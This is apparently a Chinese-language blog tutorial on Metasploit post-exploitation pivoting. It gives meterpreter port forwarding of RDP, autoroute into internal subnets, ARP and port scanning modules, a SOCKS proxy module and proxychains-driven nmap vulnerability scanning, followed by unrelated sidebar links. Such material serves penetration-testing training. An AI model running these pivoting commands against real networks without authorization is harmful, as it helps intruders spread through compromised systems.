当前位置:网站首页>MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
2022-07-06 10:01:00 【西湖第一剑】
MSF后渗透的一些操作
端口转发
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 #将目标机172.16.1.156的3389端口转发到本地2222端口
meterpreter > portfwd list #查看转发列表
meterpreter > portfwd flush #清空转发列表
rdesktop 127.0.0.1:2222 #kali远程桌面使用2222端口
添加路由,横向渗透(跨网段攻击)
run autoroute -s 172.16.2.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
route print #打印路由
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 #扫描整个段存活主机
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 #检查IP是否开放3389
利用arp扫描内网主机
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
Socks代理篇
新版的msf和老版的不一样,代理模块也不一样。
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
配置proxychains
用代理软件去连接建立好的socks隧道,便可以成功访问内网。
vi /etc/proxychains.conf #添加 socks5 127.0.0.1 7777
proxychains+nmap扫描主机是否存在漏洞
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
proxychains使用msf框架
proxychains msfconsole
边栏推荐
- FlutterWeb浏览器刷新后无法回退的解决方案
- Single responsibility principle
- [introduction to MySQL] the first sentence · first time in the "database" Mainland
- Mysqlimport imports data files into the database
- Example of batch update statement combining update and inner join in SQL Server
- Pourquoi Li shufu a - t - il construit son téléphone portable?
- 微信小程序中给event对象传递数据
- Concept and basic knowledge of network layering
- 【MySQL入门】第一话 · 初入“数据库”大陆
- OliveTin能在网页上安全运行shell命令(上)
猜你喜欢
![[introduction to MySQL] third, common data types in MySQL](/img/11/66b4908ed8f253d599942f35bde96a.png)
[introduction to MySQL] third, common data types in MySQL

历史上的今天:Google 之母出生;同一天诞生的两位图灵奖先驱

Pyspark operator processing spatial data full parsing (4): let's talk about spatial operations first
![[elastic] elastic lacks xpack and cannot create template unknown setting index lifecycle. name index. lifecycle. rollover_ alias](/img/03/ece7f7b28cd9caea4240635548c77f.jpg)
[elastic] elastic lacks xpack and cannot create template unknown setting index lifecycle. name index. lifecycle. rollover_ alias

Manifest of SAP ui5 framework json

开源与安全的“冰与火之歌”

Interview shock 62: what are the precautions for group by?

BearPi-HM_ Nano development environment

基本磁盘与动态磁盘 RAID磁盘冗余阵列区分

PySpark算子处理空间数据全解析(5): 如何在PySpark里面使用空间运算接口
随机推荐
李書福為何要親自掛帥造手機?
How to output special symbols in shell
偷窃他人漏洞报告变卖成副业,漏洞赏金平台出“内鬼”
[getting started with MySQL] fourth, explore operators in MySQL with Kiko
Pourquoi Li shufu a - t - il construit son téléphone portable?
Spark calculation operator and some small details in liunx
Xin'an Second Edition: Chapter 26 big data security demand analysis and security protection engineering learning notes
【ASM】字节码操作 ClassWriter 类介绍与使用
Xin'an Second Edition: Chapter 25 mobile application security requirements analysis and security protection engineering learning notes
传统家装有落差,VR全景家装让你体验新房落成效果
Guidelines for preparing for the 2022 soft exam information security engineer exam
Smart street lamp based on stm32+ Huawei cloud IOT design
视频融合云平台EasyCVR增加多级分组,可灵活管理接入设备
微信小程序中给event对象传递数据
Getting started with pytest ----- allow generate report
Why should Li Shufu personally take charge of building mobile phones?
OliveTin能在网页上安全运行shell命令(上)
Cool Lehman has a variety of AI digital human images to create a vr virtual exhibition hall with a sense of technology
Debug xv6
Grafana 9 正式发布,更易用,更酷炫了!